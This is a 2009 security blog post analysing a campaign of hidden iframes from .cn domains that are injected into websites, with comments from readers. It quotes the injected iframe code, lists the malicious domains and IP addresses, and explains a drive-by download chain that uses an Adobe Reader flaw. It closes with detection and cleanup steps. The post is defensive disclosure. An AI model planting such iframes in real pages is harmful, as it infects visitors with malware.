msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Malicious “Income” IFrames from .CN Domains

   15 Apr 09   Filed in Website exploits

New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The html code looks like this

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150.  The iframes load pages with paths similar to  “in.cgi?incomeNN”, where NN is some arbitrary number.

Here is a list of domains used in this malware campaign:

  • lotultimatebet .cn
  • lotmachinesguide .cn
  • cheapslotplay .cn
  • lotultimatebet .cn
  • cutlot .cn
  • mediahousenameshopfilm .cn
  • betbigwager .cn
  • namebuypicture .cn
  • thelotbet .cn (added: 04.17.2009)
  • hotslotpot .cn (added: 04.17.2009)
  • mixante .cn(added: 04.19.2009)
  • lotante .cn (added: 04.19.2009)
  • superbetfair .cn (added: 04.19.2009)
  • litecartop .cn (added: 04.22.2009)
  • betworldwager .cn (added: 04.22.2009)
  • litecarfinestsite .cn (added: 04.22.2009)
  • homenameregistration .cn (added: 04.22.2009)
  • litegreatestdirect .cn (added: 04.25.2009)
  • playbetwager .cn (added: 04.25.2009)
  • nameashop .cn (added: 04.29.2009)
  • mainnameshop .cn (added: 04.29.2009)
  • superlitecarbest .cn (added: 04.29.2009)
  • internetnamestore .cn (added: 04.30.2009)
  • dotcomnameshop .cn (added: 05.02.2009)
  • mediahomenamemartvideo .cn (added: 05.11.2009)

Hidden iframe detection

As most other iframe injection exploits, this one can be easily detected by Unmask Parasites.  You will see hidden iframes in the “External References” section.

lotultimatebet.cn iframe

Sometimes you can see more then one iframe injected into the same web page.

three hidden iframes: namebuypicture.cn, cutlot.cn, lotmachinesguide.cn

Safe Browsing Diagnostics

To my surprise these iframes are poorly detected by Google. Many compromised web sites are still not listed as suspicious. And the majority of the .cn domains used in this attack are not blacklisted either.  (I’ve been submitting the malicious domains to Google for the last couple of days, to no avail.)

Flagged domains

When Google detects the malicious content you will see the follow text on Safe Browsing diagnostic pages: “Malicious software is hosted on 1 domain(s), including hyperliteautoservices .cn/.

This happens because the initial pages in the iframes redirect to a malicious script on hyperliteautoservices .cn, that checks plugins installed in a visitor’s browser and downloads either an infected PDF file or a Flash (swf) file (browsers automatically open such files).  This happens behind the scenes, so people would never know about the infection.

These files change every day which makes virus detection very problematic. I sent both files to VirusTotal and the detection rates were very low: 5/40 for readme.pdf and 2/40 for flash.swf . None of major anti-virus tools detected these files.

Adobe Acrobat vulnerability.

I checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report.  This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“.

If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.

This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151). According to VirusTotal, the detection rate of this malware is very low – 3/40.

How to clean up?

  1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
  2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
  3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
  4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
  5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
  6. If your site was flagged by Google, request a malware review via Webmaster Tools.
  7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.

If you have any additional information on this issue or want to ask a question, consider leaving a comment below.

Similar posts:

Reader's Comments (78)

  1. |

    One of my client site infect with iframe that redirect to this sites : 3b4 .ru/, q3e .in/, x3y .ru/, using port 8080.

    Make sure you clean up all the files that infected ( …. ) and find suspicious javascript code that inject into index.html files on your site. Better not using frame anymore on your site.

  2. |

    Nice points you have made about web security.
    Thanks for the post, informative and inciteful, made me think more about web security.

  3. |

    […] http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ […]

  4. |

    Hi, last night a new folder turned up in the root of my ftp, named .gnome2, which is seemingly empty. I didnt put it there, the server guys didnt put it there, so I cant see what else it could be but some sort of hack/phising tactic.

    Searching .gnome2 doesnt bring up much in the way of info on other cases, but it certianly does worry me and has had me reading up on security and malicious practices all day.

    Im not sure what to do here really, I will follow a few of your rec’s, but if you have ever heard of this before please advise accordingly.

    Thanks

    • |

      .gnome2 is a folder of the Gnome 2.x (desktop for Linux computers). However this desktop is not used on servers.

      Check the owner of the folder and the creation date.

  5. |

    This is a site I did, It got hit pretty bad.. the “virus” comes again again, I have cleaned my own computer. But how can they change the html files so fast?.. just few hours later, the virus is back. Is it a javascript file? Or is something logging into the ftp and changing the files?

  6. |

    You can make sure you have a proper firewall in front of your server which will may protect you from these sort of attacks…lock it right down and only open the ports your require. Also you can block domain’s which can help